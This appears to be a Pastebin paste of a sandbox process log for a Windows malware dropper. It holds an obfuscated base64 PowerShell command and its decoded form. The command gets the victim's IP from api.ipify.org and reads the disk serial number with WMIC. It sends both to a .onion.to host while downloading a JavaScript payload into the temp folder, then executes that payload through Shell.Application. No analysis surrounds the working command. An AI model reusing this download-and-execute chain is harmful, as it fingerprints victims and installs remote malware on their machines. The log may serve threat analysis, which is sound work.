Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- powershell.exe powershell -EncodedCommand "JABGAD0AJABlAG4AdgA6AFQAZQBtAHAAKwAnAFwAUwBUAFMAagBiAGUALgBqAHMAJwA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AdQA1ADcAdAB2AHEANwBtAHYAeQA3AHgAcwBlAC4AbwBuAGkAbwBuAC4AdABvAC8AUwBUAFMAagBiAGUALgBqAHMAPwBpAHAAPQAnACsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYQBwAGkALgBpAHAAaQBmAHkALgBvAHIAZwAvACcAKQArACcAJgBpAGQAPQAnACsAKAAoAHcAbQBpAGMAIABwAGEAdABoACAAdwBpAG4AMwAyAF8AbABvAGcAaQBjAGEAbABkAGkAcwBrACAAZwBlAHQAIAB2AG8AbAB1AG0AZQBzAGUAcgBpAGEAbABuAHUAbQBiAGUAcgApAFsAMgBdACkALgB0AHIAaQBtACgAKQAuAHQAbwBMAG8AdwBlAHIAKAApACwAJABGACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAGMAbwBtACAAUwBoAGUAbABsAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuACkALgBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAoACQARgApADsA" (PID: 2056, Additional Context: ( System.Net.WebClient).DownloadFile('https://bou57tvq7mvy7xse.onion.to/STSjbe.js?ip='+( System.Net.WebClient).DownloadString('http://api.ipify.org/')+'&id='+((wmic path win32_logicaldisk get volumeserialnumber)[2]).trim().toLower(),$F)( -com Shell.Application).ShellExecute($F))
- WMIC.exe path win32_logicaldisk get volumeserialnumber (PID: 2172)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement